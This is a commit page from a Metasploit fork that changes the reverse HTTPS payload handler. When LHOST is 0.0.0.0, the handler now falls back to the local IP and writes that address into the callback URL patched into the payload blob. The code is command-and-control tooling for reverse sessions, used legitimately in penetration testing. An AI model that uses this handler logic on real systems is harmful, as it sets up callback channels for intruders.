adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Handle situations where the user set LHOST to 0.0.0.0 in the handler by defaulting LHOST to our locally visible IP for the specific client. Solves some integration issues where 0.0.0.0 was accidentally used

Browse Source 
git-svn-id: file:///home/svn/framework3/trunk@13782 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
HD Moore
2011-09-23 17:04:24 +00:00
parent 4d850c1ee6
commit 616913c4c1
2 changed files with 20 additions and 5 deletions
Download Patch File Download Diff File Expand all files Collapse all files
lib/msf/core/handler/reverse_https.rb
+9 -2
View File
@@ -124,11 +124,18 @@ protected
print_status("#{cli.peerhost}:#{cli.peerport} Request received for #{req.relative_resource}...")
lhost = datastore['LHOST']
# Default to our own IP if the user specified 0.0.0.0 (pebkac avoidance)
if lhost.empty? or lhost == '0.0.0.0'
lhost = Rex::Socket.source_address(cli.peerhost)
end
# Process the requested resource.
case req.relative_resource
when /^\/INITJM/
conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00"
url = "https://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00"
#$stdout.puts "URL: #{url.inspect}"
blob = ""
@@ -176,7 +183,7 @@ protected
conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
i = blob.index("https://" + ("X" * 256))
if i
url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00"
url = "https://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00"
blob[i, url.length] = url
end
print_status("Patched URL at offset #{i}...")